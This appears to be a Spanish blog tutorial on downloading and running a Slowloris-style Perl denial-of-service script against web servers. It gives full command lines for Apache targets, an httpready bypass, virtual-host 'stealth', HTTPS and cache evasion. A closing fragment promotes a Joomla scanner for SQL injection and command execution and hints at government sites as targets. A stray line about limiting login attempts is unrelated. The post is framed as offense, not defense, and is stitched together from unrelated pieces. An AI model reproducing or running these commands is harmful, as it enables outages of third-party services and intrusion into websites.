[/caption]Un ataque de DDoS provoca la pérdida de la conectividad deL SERVIDOR por el consumo del ancho de banda y la sobrecarga de los recursos que necesita el servidor para ser estable.Este Script en Perl ayuda a identificar las ventanas de tiempo de espera de un servidor HTTP o servidor proxy, puede pasar por alto la proteccion y en ultima instancia httpready realiza una negacion de ancho de banda bastante baja del servicio. Tiene la ventaja agregada de permitir que el servidor vuelva a estar en cualquier momento (una vez que el programa esta muerto), y no los registros de envio de correo basura en exceso. Tambien se mantiene la carga agradable y baja en el servidor de destino, los procesos vitales para que otros no mueran inesperadamente, o causar alarma a cualquiera que este conectado al servidor por otras razones.
>>Descargar DDOS/Slowloris<<
Pero antes necesitas Perl asi que descargar el siguiente archivo ya que no podras utilizar pues no compilara :
>>Descargar Perl<<
>>tutorial>>
Un poco de teoria :
Perl “Práctico de Extracción y Reporting Language“.Perl es un lenguaje de programación de gran variedad de usos. A los efectos de esta base de conocimientos, nos referimos a Perl más a menudo en el contexto de los scripts CGI y programas web que puede ser escrito en Perl.
Pagina web >> Perl
1.-Descomprimes en el ESCRITORIO
[caption id="" align="aligncenter" width="200" caption="DDoS -Parada Geek- Perl 1"]
[/caption]2.- Acedemos a CMD ( lineas de comandos) con Windows+r y escribes CMD. Para llegar ala carpeta realizas lo siguiente dandole enter en cada linea:
[caption id="" align="aligncenter" width="517" caption="DDoS -Parada Geek- Perl 2"]
[/caption]3.-Si todo Salio OK saldra esta ventana( y le das enter si te salio).
[caption id="" align="aligncenter" width="587" caption="DDoS -Parada Geek- Perl 3"]
[/caption]4.- Ahora iremos a escanear de la siguiente manera colocando la siguiente linea:
perl ddos.pl -dns www.pagina.com -options
También puedes usar lo siguiente:
Para los ataques DDOS en servidores Apache:
>> perl ddos.pl -dns www.página.com -port 80 -timeout 2000 -num 500 -tcpto 5
Para un Bypass en HTTPReady : Para pasar por alto httpready enviando el ataque como un POST de los versos de una solicitud GET o HEAD con el interruptor-http.
>>perl ddos.pl -dns www.página.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
Sigilo Host DOS: Para cuando el servidor tiene multiples servidores web que se ejecutan enuna máquina virtual
>>perl ddos.pl -dns www.página.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.Hostvirtual.com
Dos HTTPS :es compatible con SSL / TLS
>>perl ddos.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
HTTP cache:evitar el soporte de cache
>>perl ddos.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
[caption id="" align="aligncenter" width="586" caption="DDoS -Parada Geek- Perl 4"]
[/caption]5.- Si todo estuvo correcto empezara el ataque DDos
[caption id="" align="aligncenter" width="585" caption="DDoS -Parada Geek- Perl 5"]
[/caption]>>Descargar DDOS/Slowloris<<
Pero antes necesitas Perl asi que descargar el siguiente archivo ya que no podras utilizar pues no compilara :
>>Descargar Perl<<
Detecta la inclusión de archivos, la inyección de SQL, las vulnerabilidades de ejecución de comandos de un objetivo de Joomla! del sitio web. Basado en la herramienta Owasp una herramienta un poco antigua pero actualizada con respecto a los plugins que utiliza Joomla. Trabaja con Perl asi que necesitamos descargarlo. Casi gran parte de las paginas gubernamentales estan en joomla. Asi que esta herramienta será muy útil. :twisted:
Limite el número de intentos de conexión posibles, tanto a través de inicio de sesión normal, así como el uso de cookies autenticación.